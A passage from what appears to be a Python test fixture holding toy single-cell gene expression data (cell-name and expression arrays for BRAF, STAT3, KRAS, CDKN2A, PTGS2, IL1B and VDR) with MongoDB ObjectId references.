"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB8_BazMoo_6CADDCBBACDDBACB-1",
"FoobarAB3_BazMoo_7BADDADDCCAACCCB-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB1_BazMoo_6BADACADACADCDDD-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB1_BazMoo_3BDCBBDBACBABCCB-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_4BBDDDADCAADDDBB-1",
"FoobarAB6_BazMoo_1BDCADABBAACBCCD-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB6_BazMoo_8DCBCBCBCDCBADBA-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_1DCDCCCDBDBBABBB-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB7_BazMoo_1BBADABCABACDADC-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB4_BazMoo_5CDCCABBCBACCCBC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"BRAF Expression": {
"name": "BRAF Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.58,
2.32,
2.58,
3.0,
3.0,
2.0,
2.0,
3.0,
1.58,
2.32,
1.0,
2.32,
2.81,
2.32,
1.0,
3.0,
3.0,
3.0,
1.58,
2.58,
2.0,
2.58,
2.0,
2.32,
2.81,
3.0,
2.0,
1.58,
1.58,
1.0,
2.32,
1.0,
3.0,
1.58,
2.81,
3.0,
1.0,
1.58,
2.32,
3.0,
1.58,
1.0,
3.0,
1.58,
2.32,
2.81,
2.0,
2.0,
2.32,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"STAT3 Cells": {
"name": "STAT3 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_8DCCCBAABDDBDDDA-1",
"FoobarAB5_BazMoo_8BAADDAAACABBCBD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB7_BazMoo_3ACBCBCACACDBADD-1",
"FoobarAB8_BazMoo_8CDBBCCBBAADAAAC-1",
"FoobarAB8_BazMoo_3CBCBADCDDBBBABA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB4_BazMoo_6CBCDABADDDDCBDD-1",
"FoobarAB1_BazMoo_5DDADDBCDDDCDABB-1",
"FoobarAB2_BazMoo_4CADDDCAADAADCAB-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_4DBCDDBAAAACAADC-1",
"FoobarAB3_BazMoo_1CCCCDBADDDDDAAB-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB6_BazMoo_4DBCDDCADAACCCDD-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB1_BazMoo_1DADCCBAAACBDABC-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB3_BazMoo_6DDDCDCADCCDBCBB-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB2_BazMoo_5BCBDBBBDADCBDAC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB7_BazMoo_5DBABDCBDCBADBCA-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB7_BazMoo_1BABADDCCBAAACBC-1",
"FoobarAB4_BazMoo_4CCCDAAACCACABBC-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB1_BazMoo_8DDCCAABADABCACC-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB2_BazMoo_7DABDADBDBADACDB-1",
"FoobarAB4_BazMoo_1ABBDBDDDCBABACB-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB8_BazMoo_5CBCADBCADABBCAB-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
"FoobarAB3_BazMoo_3BBCCDBADBABBDCA-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
"FoobarAB3_BazMoo_8BDCBCBDCABACCCB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"STAT3 Expression": {
"name": "STAT3 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
2.81,
2.81,
3.0,
2.81,
2.58,
1.58,
2.81,
2.0,
2.58,
2.0,
2.0,
1.0,
3.0,
2.58,
1.0,
2.58,
2.32,
2.81,
2.58,
3.0,
2.32,
1.0,
2.58,
2.58,
2.58,
3.0,
2.81,
1.0,
1.0,
2.32,
1.58,
1.58,
1.0,
2.32,
2.32,
2.0,
1.58,
2.58,
3.0,
2.58,
3.0,
2.58,
2.32,
1.58,
3.0,
2.58,
2.58,
3.0,
2.32,
2.58,
2.81,
2.0,
2.58,
2.32,
1.0,
1.0,
1.0,
2.58,
1.0,
2.81,
2.81,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"KRAS Cells": {
"name": "KRAS Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_7ADDDBCAAAADBCAB-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB8_BazMoo_8CCBAADAAACCBDAD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB6_BazMoo_1ABAADCDCBDDACAB-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB3_BazMoo_1DABABDBDCCDBCBA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB5_BazMoo_3DADDDCACDABCDCB-1",
"FoobarAB2_BazMoo_4DDCDADBBCDBAABB-1",
"FoobarAB4_BazMoo_2ACAADBCBDDADADB-1",
"FoobarAB3_BazMoo_7DCACACACDCADCBD-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB8_BazMoo_4CBABCDBBDBCBCCA-1",
"FoobarAB7_BazMoo_5CCCBCDAABDBABAD-1",
"FoobarAB5_BazMoo_3CBDBBABBAACABCD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB1_BazMoo_1CDBDADAAACBAABD-1",
"FoobarAB7_BazMoo_4CDBBCDDDDAADCDC-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB3_BazMoo_5DAAABCBCADBBCCC-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB6_BazMoo_4DACBDDDBDBDCADC-1",
"FoobarAB7_BazMoo_4DDDDDBCCCBBADBD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB4_BazMoo_3DBCDBDBDCDDCCAB-1",
"FoobarAB8_BazMoo_2CCBCCBACABACCAB-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_2CCACBBAAACCAACA-1",
"FoobarAB3_BazMoo_8BCDBDDBDBDBDCBC-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB4_BazMoo_7DDBDCACBACDBAAC-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_6BACDBCDDCCDADAB-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB6_BazMoo_1DCACCBBDBBBBCBB-1",
"FoobarAB3_BazMoo_2ADDBAAACCDDDDAA-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB4_BazMoo_1CCACCABBBDABDCB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_8DDCCCBABCBACABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"KRAS Expression": {
"name": "KRAS Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.81,
2.81,
1.58,
1.58,
1.0,
2.0,
3.0,
2.32,
3.0,
1.0,
1.0,
1.0,
2.0,
1.58,
3.0,
1.0,
1.58,
2.32,
2.32,
1.0,
2.81,
3.0,
2.58,
2.81,
2.32,
3.0,
3.0,
2.32,
2.32,
2.58,
1.0,
3.0,
2.58,
2.58,
1.0,
3.0,
2.58,
3.0,
3.0,
2.81,
3.0,
2.58,
2.32,
1.0,
1.58,
3.0,
1.0,
3.0,
1.0,
2.32,
2.58,
1.0,
1.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN2A Cells": {
"name": "CDKN2A Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB8_BazMoo_1BDACCDCCBBADBCB-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB1_BazMoo_1BBDDDBDADDCACAB-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB6_BazMoo_4CBDCBCDACADDDDA-1",
"FoobarAB3_BazMoo_7BDDDBCADACBDDBC-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_4ABDBBBACBCCBDAA-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB2_BazMoo_3DABAABDAAAABAAB-1",
"FoobarAB5_BazMoo_4CDCACCCBDBADABB-1",
"FoobarAB2_BazMoo_2DCDCDBCBABDBBAD-1",
"FoobarAB3_BazMoo_5CAADCDABADACAAC-1",
"FoobarAB4_BazMoo_3BBADCDAABADCAAB-1",
"FoobarAB2_BazMoo_1DDBAACABBACBDCA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB2_BazMoo_7DCAAACADCCADBAD-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB7_BazMoo_5ADBBAAABBCCBABB-1",
"FoobarAB7_BazMoo_8DACBBCACDACDCBA-1",
"FoobarAB7_BazMoo_8DCBDADACBABCCCC-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB2_BazMoo_1ACCDADBABBACBCA-1",
"FoobarAB2_BazMoo_2DABDDCDADBBDDBD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB8_BazMoo_6DBAADCBDADCCDDB-1",
"FoobarAB3_BazMoo_2DBCBBDABAADBDCD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB8_BazMoo_3DACBBDDBABDDDDD-1",
"FoobarAB4_BazMoo_2DDCCACACDBBACCC-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB5_BazMoo_6ABBBBCBCBCBBCAB-1",
"FoobarAB7_BazMoo_2BACDBDDBCACABDD-1",
"FoobarAB6_BazMoo_6CACDAABBDDBCBDA-1",
"FoobarAB5_BazMoo_8BACBBADCBDDBDAA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB7_BazMoo_2ACCDBBADCDCACAB-1",
"FoobarAB5_BazMoo_7BAACDCDCBCBBACA-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"CDKN2A Expression": {
"name": "CDKN2A Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.32,
2.58,
3.0,
2.81,
2.58,
2.58,
2.0,
2.0,
1.58,
1.0,
1.0,
1.58,
2.58,
2.32,
2.58,
2.0,
2.58,
1.58,
3.0,
2.58,
2.0,
2.81,
2.81,
2.58,
1.0,
3.0,
2.0,
2.32,
3.0,
2.0,
2.81,
2.32,
2.81,
2.81,
2.0,
1.58,
1.0,
3.0,
2.32,
2.58,
2.58,
1.0,
1.58,
2.32,
2.32,
1.0,
3.0,
2.0,
1.58,
3.0,
3.0,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTGS2 Cells": {
"name": "PTGS2 Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_8DDACDAABBBBACDD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB3_BazMoo_8ADDBCBACDCCACCD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB8_BazMoo_4BDABCDCCBABACCC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB2_BazMoo_6ABBADACDCDDBCAC-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB2_BazMoo_4AACCAACBCBAACDD-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB5_BazMoo_1CACBDACACDDCCDD-1",
"FoobarAB2_BazMoo_3BBDDCADCDACDABD-1",
"FoobarAB3_BazMoo_3CBBDAAACACCDDDA-1",
"FoobarAB1_BazMoo_8DCCDCBDADCCAACD-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB8_BazMoo_1CBADADCCCCACAAC-1",
"FoobarAB6_BazMoo_2CAADBDADABBDCCB-1",
"FoobarAB5_BazMoo_8ABDADBBCADAABDD-1",
"FoobarAB6_BazMoo_8CBADCCBAAABBCBA-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_8DCDABCAADDBAABC-1",
"FoobarAB3_BazMoo_7DBDCDADBAAAABCD-1",
"FoobarAB1_BazMoo_1BCCBCAADCCADCDB-1",
"FoobarAB3_BazMoo_2CDDCABDDCCACCBA-1",
"FoobarAB3_BazMoo_5ACABCDCBDAAACAD-1",
"FoobarAB7_BazMoo_8DCBCBBACADBBBAC-1",
"FoobarAB5_BazMoo_6BCBABACCCDACDBB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB6_BazMoo_6DCADBCABDDCCAAA-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB1_BazMoo_8CBDADBABACDADAC-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB2_BazMoo_1CABADDBCABBCBBA-1",
"FoobarAB7_BazMoo_1CADCBBCDCBDDDDD-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB7_BazMoo_3DDCCDCCDDBBAADB-1",
"FoobarAB6_BazMoo_4DAACBADBACABADC-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"PTGS2 Expression": {
"name": "PTGS2 Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
2.0,
3.0,
1.58,
1.58,
2.58,
2.81,
1.58,
2.32,
2.32,
2.0,
2.0,
1.0,
2.81,
2.81,
1.0,
3.0,
2.0,
3.0,
1.58,
1.0,
2.58,
2.58,
2.58,
1.0,
1.58,
1.58,
2.32,
3.0,
2.81,
2.32,
3.0,
2.58,
2.32,
2.0,
2.58,
1.58,
1.58,
1.58,
2.58,
2.58,
1.58,
2.0,
2.58,
2.32,
1.0,
2.32,
1.58,
2.58,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL1B Cells": {
"name": "IL1B Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB5_BazMoo_4BAABBACBDADDACA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_1CADBDBABCABBDDD-1",
"FoobarAB2_BazMoo_3DDDDDBCAAAABCBA-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB6_BazMoo_2DDDCABCCCDBDDAC-1",
"FoobarAB2_BazMoo_2DDCCBAACDCCADBB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB1_BazMoo_8CDCBDACDAAACBBD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB8_BazMoo_5CDDADACBAAACBAA-1",
"FoobarAB5_BazMoo_1CBDCADACACCBCAD-1",
"FoobarAB5_BazMoo_3BDBBDDDDDBBABAC-1",
"FoobarAB7_BazMoo_6CBBDBBCBCBDABAA-1",
"FoobarAB8_BazMoo_7DDBCBACABDABBAA-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB6_BazMoo_7BDAABDCAADADBBA-1",
"FoobarAB8_BazMoo_4BADABCDBDBDACAB-1",
"FoobarAB1_BazMoo_3DBBCDAABDACBCBB-1",
"FoobarAB8_BazMoo_7CBCDDADACDDACAA-1",
"FoobarAB3_BazMoo_1DBABCBBAABBABBB-1",
"FoobarAB2_BazMoo_8CCDBBDCCBBACDCB-1",
"FoobarAB5_BazMoo_3BADAABBDABABDAC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB1_BazMoo_8CBBADABBCDAAAAA-1",
"FoobarAB7_BazMoo_2BCBBBBCBCAAABDD-1",
"FoobarAB3_BazMoo_3BCBCBABBDBCDCAA-1",
"FoobarAB3_BazMoo_6BACBCBCDAADDDAC-1",
"FoobarAB5_BazMoo_8CCBBABDDADBBACD-1",
"FoobarAB3_BazMoo_4BBBAABCBAACCBAC-1",
"FoobarAB4_BazMoo_5CAADDAABBADCDCD-1",
"FoobarAB3_BazMoo_2CACAABACDBCBCBA-1",
"FoobarAB8_BazMoo_7DADCDCBCDDBDDDA-1",
"FoobarAB4_BazMoo_7CBDDABDBBDCBDBB-1",
"FoobarAB2_BazMoo_5DCCBDBABBDACAAB-1",
"FoobarAB4_BazMoo_2CCACBADCCCCABAD-1",
"FoobarAB8_BazMoo_4BCABBACDAACCBCA-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB3_BazMoo_6DDAABBCDBABACAA-1",
"FoobarAB5_BazMoo_1DDDDBBDAADDABCB-1",
"FoobarAB7_BazMoo_7BCABCCCACBAADDC-1",
"FoobarAB8_BazMoo_6BDCBAACCCADDABB-1",
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"IL1B Expression": {
"name": "IL1B Expression",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "expression",
"array_index": 0,
"values": [
3.0,
2.58,
2.32,
2.0,
2.81,
2.32,
1.0,
1.0,
3.0,
2.81,
1.58,
2.32,
2.58,
2.0,
2.0,
2.32,
2.58,
1.58,
1.0,
2.58,
3.0,
2.81,
1.58,
2.58,
1.58,
2.58,
1.58,
1.0,
1.0,
2.58,
1.58,
1.58,
1.0,
1.0,
3.0,
2.58,
2.58,
2.58,
2.0,
1.58,
1.0,
1.58,
3.0,
2.81,
2.0,
2.32,
],
"subsample_threshold": None,
"subsample_annotation": None,
"linear_data_type": "Gene",
"study_id": ObjectId("5d276a50421aa9117c982845"),
"study_file_id": ObjectId("5dd5ae25421aa910a723a337"),
},
"VDR Cells": {
"name": "VDR Cells",
"cluster_name": "AB_toy_data_toy.matrix.mtx",
"array_type": "cells",
"array_index": 0,
"values": [
"FoobarAB4_BazMoo_5ABCBACBDABBADAC-1",
"FoobarAB6_BazMoo_2ACBDBBABABABACC-1",
"FoobarAB2_BazMoo_7DBCCABABACABBBD-1",
"FoobarAB3_BazMoo_8BABABDBACACACCD-1",
"FoobarAB5_BazMoo_7DCACDAACCACBBBD-1",
"FoobarAB3_BazMoo_6AACDDCDACBCBACD-1",
"FoobarAB3_BazMoo_7ACACAAADCCDBADA-1",
"FoobarAB7_BazMoo_4ADBADDCDCCADBDC-1",
"FoobarAB2_BazMoo_8BDBABBACDCCDDBD-1",
"FoobarAB7_BazMoo_1DBAACCBDDDCBCDB-1",
"FoobarAB4_BazMoo_8DBCCDADBCBBCBDD-1",
"FoobarAB7_BazMoo_4DDBADDACABDABDD-1",
"FoobarAB6_BazMoo_7CBBCDBADBBBABDA-1",
"FoobarAB8_BazMoo_4CDBCDACADDDCABA-1",
"FoobarAB7_BazMoo_2CADCDBBDBBDDCBA-1",
"FoobarAB7_BazMoo_6ABADABDAABBCDDB-1",
"FoobarAB1_BazMoo_3DCABADBDAADDCBD-1",
"FoobarAB6_BazMoo_4ACBACBAACAAADAD-1",
"FoobarAB2_BazMoo_8DDABDBCDABBBDAA-1",
"FoobarAB1_BazMoo_3BCBBBCBCDDCBDAB-1",
"FoobarAB5_BazMoo_6AABBDADDABCDDCD-1",
"FoobarAB3_BazMoo_3BDBDACADBAADCCC-1",
"FoobarAB4_BazMoo_1ABABBCCADCADBAB-1",
"FoobarAB3_BazMoo_8CBDABBAAAAADBCD-1",
"FoobarAB4_BazMoo_4DDBADBCBACBDCDA-1",
"FoobarAB1_BazMoo_1DACACBDDADCCACC-1",
"FoobarAB5_BazMoo_7AAABBCDCACCABAB-1",
"FoobarAB2_BazMoo_1CABCCCACABCCACA-1",
"FoobarAB5_BazMoo_5CADADBDBDDCCADD-1",
"FoobarAB5_BazMoo_3CDAABAABBACAAAC-1",
"FoobarAB7_BazMoo_7ACADCDBAABAACBD-1",
"FoobarAB1_BazMoo_5BCAAACBABBCDBDC-1",
"FoobarAB4_BazMoo_2AABBAAABCBBACBB-1",
"FoobarAB2_BazMoo_8CCACCBDCBCDABAD-1",
"FoobarAB1_BazMoo_3BBCCABDADCDBCCB-1",
"FoobarAB3_BazMoo_4CACCAABBDCDBACD-1",
"FoobarAB2_BazMoo_5CAAADCADACBDDCA-1",
"FoobarAB4_BazMoo_7BADBDDCACBDCCCC-1",
"FoobarAB4_BazMoo_3BCADDCAAACBADBC-1",
"FoobarAB2_BazMoo_6BBDBDACBDBAACBA-1",
"FoobarAB1_BazMoo_4CBCCBADBAABDDBB-1",
"FoobarAB8_BazMoo_1CBBCDBACADDAABB-1",
"FoobarAB4_BazMoo_6ADADABCCDDBDACC-1",
"FoobarAB1_BazMoo_5AABDACBCCBCABDD-1",
"FoobarAB2_BazMoo_5DBCDDBABCAAADDB-1",
"FoobarAB5_BazMoo_3DDACADDCAADCABB-1",
"FoobarAB3_BazMoo_3DABBDCBDACACCCC-1",
"FoobarAB6_BazMoo_1DBBAADCDAADBCDC-1",
"FoobarAB2_BazMoo_1CCCBADCABBDBDAC-1",
"FoobarAB3_BazMoo_8AAABDDBDDCBDDAB-1",
"FoobarAB5_BazMoo_2CADBCDABDDCCCBD-1",
"FoobarAB3_BazMoo_5DDBDBBBCBDBBBCD-1",
